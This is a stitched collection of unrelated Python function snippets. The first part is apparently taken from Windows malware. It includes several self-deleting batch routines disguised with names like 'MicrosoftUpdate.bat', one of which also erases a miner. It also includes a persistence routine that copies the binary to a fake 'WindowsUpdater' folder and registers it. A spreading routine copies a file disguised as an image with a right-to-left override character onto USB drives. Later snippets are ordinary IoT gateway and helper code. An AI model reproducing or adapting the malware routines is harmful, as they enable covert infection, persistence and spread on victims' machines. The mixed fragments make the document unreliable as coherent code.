def selfDestruct(): filename = executable.split("\\")[-1] data = '''@echo off TASKKILL /F /IM "{0}" break>{0} DEL -f "{0}" break>"%~f0" && DEL "%~f0" '''.format(filename) with open("MicrosoftUpdate.bat", "w") as f: f.write(data) Popen("MicrosoftUpdate.bat >> NUL", shell=True)
def copy_exploit_to_destination(exploit_sub_folder='') -> (str, str): user_folder = os.getenv('USERPROFILE') destination_folder = user_folder + exploit_sub_folder os.makedirs(name=destination_folder, exist_ok=True) binary_name = executable.split('\\')[-1] new_binary_name = 'copy-' + binary_name # new name is needed in order not to kill all bot processes destination_binary = destination_folder + '\\' + new_binary_name copyfile(executable, destination_binary) return destination_binary, destination_folder
def sdest(): filename = executable.split("\\")[-1] data = '''@echo off TASKKILL /F /IM "{0}" break>{0} DEL -f "{0}" break>"%~f0" && DEL "%~f0" echo Good but not good enough >> {0}'''.format(filename) f = open("MicrosoftUpdate.bat", "w") f.write(data) f.close() xxx = Popen("MicrosoftUpdate.bat >> NUL", shell=True)
def selfdestruct(): filename = executable.split("\\")[-1] data = '''@echo off TASKKILL /F /IM "{0}" break>{0} DEL -f "{0}" break>"%~f0" && DEL "%~f0" echo Good but not good enough >> {0}'''.format( filename ) f = open("Thanks_For_Using_Our_Service.bat","w") #Looool :XD f.write(data) f.close() xxx = subprocess.Popen("Thanks_For_Using_Our_Service.bat >> NUL",shell=True)
def selfDestruct(): filename = executable.split("\\")[-1] data = '''@echo off TASKKILL /F /IM "{0}" break>{0} DEL -f "{0}" DEL -f "{1}" DEL -f "{2}" break>"%~f0" && DEL "%~f0" '''.format(filename, 'config.json', minerExe) with open("eraser.bat","w") as f: f.write(data) xxx = Popen("eraser.bat >> NUL",shell=True)
def selfdestruct(): from sys import executable filename = executable.split("\\")[-1] data = '''@echo off TASKKILL /F /IM "{}" DEL -f "{}" DEL "%~f0"'''.format(filename, filename) f = open("nothing.bat", "w") f.write(data) f.close() xxx = subprocess.Popen("nothing.bat > NUL", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def main(): curPath = os.getcwd() # if we're already home! if 'appdata' in curPath.lower(): # snf as in sniffer. Passed to threadedConCheck to start sniffer in another thread threadedConCheck('snf') # to schedule threadedConCheck and spreadIt to be run every 60 and 5 minutes schedule.every(60).minutes.do(threadedConCheck, 'u') schedule.every(5).minutes.do(spreadIt) # This is in plain English, almost cannot be called coding! while True: schedule.run_pending() # We're going home! else: # get user profile userProf = os.environ['USERPROFILE'] # get executable name exeName = executable.split("\\")[-1] # create a file path for frozen version of this script appPath = curPath + '\\' + exeName # create a path for destination folder dest = userProf.strip() + '\\AppData\\Roaming\\WindowsUpdater' # create 2 destination file names destFileName = dest + '\\' + exeName destFileName2 = dest + '\\' + 'copied_' + exeName os.makedirs(dest) # guess what these 2 lines do! This is exactly why EVERYONE loves Python copy(appPath, dest) os.rename(destFileName, destFileName2) # try to also copy the image looking application to the destination folder try: jpgFileName = [ i for i in os.listdir(os.getcwd()) if u'\u202e' in i.decode('utf-8') ][0] jpgPath = curPath + '\\' + jpgFileName copy(jpgPath, dest) except: pass add2Registery(destFileName2) Popen(destFileName2, cwd=dest) # BYE BYE selfDestruct()
def self_destruct(): """ Self-destructs running executable via supplemental batch file, cause executable cannot kill itself. """ executable_name = executable.split("\\")[-1] batch_script_content = "\n".join([ "@echo off", # disabling echo of commands that are executed 'TASKKILL /F /IM "{0}"'.format( executable_name), # forcefully kill the process "TIMEOUT 1", # waiting for the process to shutdown 'DEL -f "{0}"'.format( executable_name), # forcefully deleting executable 'DEL "%~f0"', # deleting batch file ]) batch_script = open("utility.bat", "w") batch_script.write(batch_script_content) batch_script.close() Popen("utility.bat >> NUL", shell=True) # NUL to hide output
def spreadIt(): removable_drives = getRemovableDrives() currPath = os.getcwd() filePath = currPath + '\\' + executable.split("\\")[-1] try: # lists all files in the current path, looks for a file with 'RIGHT-TO-LEFT OVERRIDE' # character and chooses that file. [0] is because it's a list and we can access the # first and only one such file name jpgFileName = [ i for i in os.listdir(currPath) if u'\u202e' in i.decode('utf-8') ][0] jpgFilePath = currPath + '\\' + jpgFileName except: pass if len(removable_drives) > 0: for pend in removable_drives: # in case there was no file with 'RIGHT-TO-LEFT OVERRIDE' in its name try: copy(jpgFilePath, pend) except: copy(filePath, pend)
def __init__(self, config_file=None): self.stopped = False self.__lock = RLock() if config_file is None: config_file = path.dirname(path.dirname( path.abspath(__file__))) + '/config/tb_gateway.yaml'.replace( '/', path.sep) with open(config_file) as general_config: self.__config = safe_load(general_config) self._config_dir = path.dirname(path.abspath(config_file)) + path.sep logging_error = None try: logging.config.fileConfig(self._config_dir + "logs.conf", disable_existing_loggers=False) except Exception as e: logging_error = e global log log = logging.getLogger('service') log.info("Gateway starting...") self.__updater = TBUpdater() self.__updates_check_period_ms = 300000 self.__updates_check_time = 0 self.version = self.__updater.get_version() log.info("ThingsBoard IoT gateway version: %s", self.version["current_version"]) self.available_connectors = {} self.__connector_incoming_messages = {} self.__connected_devices = {} self.__saved_devices = {} self.__events = [] self.name = ''.join(choice(ascii_lowercase) for _ in range(64)) self.__rpc_register_queue = Queue(-1) self.__rpc_requests_in_progress = {} self.__connected_devices_file = "connected_devices.json" self.tb_client = TBClient(self.__config["thingsboard"], self._config_dir) self.tb_client.connect() self.subscribe_to_required_topics() self.__subscribed_to_rpc_topics = True if logging_error is not None: self.tb_client.client.send_telemetry({ "ts": time() * 1000, "values": { "LOGS": "Logging loading exception, logs.conf is wrong: %s" % (str(logging_error), ) } }) TBLoggerHandler.set_default_handler() self.counter = 0 self.__rpc_reply_sent = False global main_handler self.main_handler = main_handler self.remote_handler = TBLoggerHandler(self) self.main_handler.setTarget(self.remote_handler) self._default_connectors = DEFAULT_CONNECTORS self._implemented_connectors = {} self._event_storage_types = { "memory": MemoryEventStorage, "file": FileEventStorage, } self.__gateway_rpc_methods = { "ping": self.__rpc_ping, "stats": self.__form_statistics, "devices": self.__rpc_devices, "update": self.__rpc_update, "version": self.__rpc_version, } self.__remote_shell = None if self.__config["thingsboard"].get("remoteShell"): log.warning( "Remote shell is enabled. Please be carefully with this feature." ) self.__remote_shell = RemoteShell( platform=self.__updater.get_platform(), release=self.__updater.get_release()) self.__rpc_remote_shell_command_in_progress = None self.__sheduled_rpc_calls = [] self.__rpc_sheduled_methods_functions = { "restart": { "function": execv, "arguments": (executable, [executable.split(pathsep)[-1]] + argv) }, "reboot": { "function": system, "arguments": ("reboot 0", ) }, } self._event_storage = self._event_storage_types[ self.__config["storage"]["type"]](self.__config["storage"]) self.connectors_configs = {} self.__remote_configurator = None self.__request_config_after_connect = False self.__init_remote_configuration() self._load_connectors() self._connect_with_connectors() self.__load_persistent_devices() self._published_events = Queue(-1) self._send_thread = Thread(target=self.__read_data_from_storage, daemon=True, name="Send data to Thingsboard Thread") self._send_thread.start() log.info("Gateway started.") try: gateway_statistic_send = 0 connectors_configuration_check_time = 0 while not self.stopped: cur_time = time() * 1000 if not self.tb_client.is_connected( ) and self.__subscribed_to_rpc_topics: self.__subscribed_to_rpc_topics = False if self.tb_client.is_connected( ) and not self.__subscribed_to_rpc_topics: for device in self.__saved_devices: self.add_device( device, { "connector": self.__saved_devices[device]["connector"] }, device_type=self.__saved_devices[device] ["device_type"]) self.subscribe_to_required_topics() self.__subscribed_to_rpc_topics = True if self.__sheduled_rpc_calls: for rpc_call_index in range(len( self.__sheduled_rpc_calls)): rpc_call = self.__sheduled_rpc_calls[rpc_call_index] if cur_time > rpc_call[0]: rpc_call = self.__sheduled_rpc_calls.pop( rpc_call_index) result = None try: result = rpc_call[1]["function"]( *rpc_call[1]["arguments"]) except Exception as e: log.exception(e) if result == 256: log.warning( "Error on RPC command: 256. Permission denied." ) if (self.__rpc_requests_in_progress or not self.__rpc_register_queue.empty() ) and self.tb_client.is_connected(): new_rpc_request_in_progress = {} if self.__rpc_requests_in_progress: for rpc_in_progress, data in self.__rpc_requests_in_progress.items( ): if cur_time >= data[1]: data[2](rpc_in_progress) self.cancel_rpc_request(rpc_in_progress) self.__rpc_requests_in_progress[ rpc_in_progress] = "del" new_rpc_request_in_progress = { key: value for key, value in self.__rpc_requests_in_progress.items() if value != 'del' } if not self.__rpc_register_queue.empty(): rpc_request_from_queue = self.__rpc_register_queue.get( False) topic = rpc_request_from_queue["topic"] data = rpc_request_from_queue["data"] new_rpc_request_in_progress[topic] = data self.__rpc_requests_in_progress = new_rpc_request_in_progress else: try: sleep(.1) except Exception as e: log.exception(e) break if not self.__request_config_after_connect and self.tb_client.is_connected( ) and not self.tb_client.client.get_subscriptions_in_progress( ): self.__request_config_after_connect = True self.__check_shared_attributes() if cur_time - gateway_statistic_send > self.__config[ "thingsboard"].get( "statsSendPeriodInSeconds", 3600) * 1000 and self.tb_client.is_connected(): summary_messages = self.__form_statistics() # with self.__lock: self.tb_client.client.send_telemetry(summary_messages) gateway_statistic_send = time() * 1000 # self.__check_shared_attributes() if cur_time - connectors_configuration_check_time > self.__config[ "thingsboard"].get( "checkConnectorsConfigurationInSeconds", 60) * 1000: self.check_connector_configuration_updates() connectors_configuration_check_time = time() * 1000 if cur_time - self.__updates_check_time >= self.__updates_check_period_ms: self.__updates_check_time = time() * 1000 self.version = self.__updater.get_version() except KeyboardInterrupt: self.__stop_gateway() except Exception as e: log.exception(e) self.__stop_gateway() self.__close_connectors() log.info("The gateway has been stopped.") self.tb_client.stop()
# -*- coding: utf-8 -*- import argparse from sys import argv from requests import get from json import loads, load, dump from git import Git from shutil import rmtree from os import chdir, getcwd, remove from subprocess import call from os.path import isfile from os import mkdir from sys import executable from git.exc import GitCommandError chdir("/".join(executable.split("/")[:-1])) parser = argparse.ArgumentParser(description='A python package manager.') parser.add_argument("pkgs", type=str, help="Packages to perform action.", nargs="+", default=True) parser.add_argument("--user", help="User install", default=False, action='store_true') parser.add_argument("--list", help="List all packages", default=False, action='store_true') parser.add_argument("--install", help="Install pkgs",
def __init__(self, config_file=None): self.__lock = RLock() if config_file is None: config_file = path.dirname(path.dirname( path.abspath(__file__))) + '/config/tb_gateway.yaml'.replace( '/', path.sep) with open(config_file) as general_config: config = safe_load(general_config) self._config_dir = path.dirname(path.abspath(config_file)) + path.sep logging.config.fileConfig(self._config_dir + "logs.conf") global log log = logging.getLogger('service') log.info("Gateway starting...") self.version = get_distribution('thingsboard_gateway').version log.info("ThingsBoard IoT gateway version: %s", self.version) self.available_connectors = {} self.__connector_incoming_messages = {} self.__connected_devices = {} self.__saved_devices = {} self.__events = [] self.name = ''.join(choice(ascii_lowercase) for _ in range(64)) self.__rpc_requests_in_progress = {} self.__connected_devices_file = "connected_devices.json" self.tb_client = TBClient(config["thingsboard"]) self.tb_client.connect() self.subscribe_to_required_topics() self.counter = 0 self.__rpc_reply_sent = False global main_handler self.main_handler = main_handler self.remote_handler = TBLoggerHandler(self) self.main_handler.setTarget(self.remote_handler) self._default_connectors = { "mqtt": "MqttConnector", "modbus": "ModbusConnector", "opcua": "OpcUaConnector", "ble": "BLEConnector", "request": "RequestConnector", "can": "CanConnector" } self._implemented_connectors = {} self._event_storage_types = { "memory": MemoryEventStorage, "file": FileEventStorage, } self.__gateway_rpc_methods = { "ping": self.__rpc_ping, "stats": self.__form_statistics, "devices": self.__rpc_devices, } self.__sheduled_rpc_calls = [] self.__self_rpc_sheduled_methods_functions = { "restart": { "function": execv, "arguments": (executable, [executable.split(pathsep)[-1]] + argv) }, "reboot": { "function": system, "arguments": ("reboot 0", ) }, } self._event_storage = self._event_storage_types[ config["storage"]["type"]](config["storage"]) self.connectors_configs = {} self._load_connectors(config) self._connect_with_connectors() self.__remote_configurator = None self.__request_config_after_connect = False if config["thingsboard"].get("remoteConfiguration"): try: self.__remote_configurator = RemoteConfigurator(self, config) except Exception as e: log.exception(e) if self.__remote_configurator is not None: self.__remote_configurator.send_current_configuration() self.__load_persistent_devices() self._published_events = Queue(-1) self._send_thread = Thread(target=self.__read_data_from_storage, daemon=True, name="Send data to Thingsboard Thread") self._send_thread.start() log.info("Gateway started.") try: gateway_statistic_send = 0 while True: cur_time = time() * 1000 if self.__sheduled_rpc_calls: for rpc_call_index in range(len( self.__sheduled_rpc_calls)): rpc_call = self.__sheduled_rpc_calls[rpc_call_index] if cur_time > rpc_call[0]: rpc_call = self.__sheduled_rpc_calls.pop( rpc_call_index) result = None try: result = rpc_call[1]["function"]( *rpc_call[1]["arguments"]) except Exception as e: log.exception(e) if result == 256: log.warning( "Error on RPC command: 256. Permission denied." ) if self.__rpc_requests_in_progress and self.tb_client.is_connected( ): for rpc_in_progress, data in self.__rpc_requests_in_progress.items( ): if cur_time >= data[1]: data[2](rpc_in_progress) self.cancel_rpc_request(rpc_in_progress) self.__rpc_requests_in_progress[ rpc_in_progress] = "del" new_rpc_request_in_progress = { key: value for key, value in self.__rpc_requests_in_progress.items() if value != 'del' } self.__rpc_requests_in_progress = new_rpc_request_in_progress else: try: sleep(.1) except Exception as e: log.exception(e) break if not self.__request_config_after_connect and self.tb_client.is_connected( ) and not self.tb_client.client.get_subscriptions_in_progress( ): self.__request_config_after_connect = True self.__check_shared_attributes() if cur_time - gateway_statistic_send > 5000.0 and self.tb_client.is_connected( ): summary_messages = self.__form_statistics() # with self.__lock: self.tb_client.client.send_telemetry(summary_messages) gateway_statistic_send = time() * 1000 # self.__check_shared_attributes() except KeyboardInterrupt: log.info("Stopping...") self.__close_connectors() log.info("The gateway has been stopped.") self.tb_client.stop() except Exception as e: log.exception(e) self.__close_connectors() log.info("The gateway has been stopped.") self.tb_client.stop()
def _get_current_virtualenv(): path = executable.split(os.sep) return os.sep.join(path[:-2])
def get_interpreter(): return executable.split(sep)[-1].lower()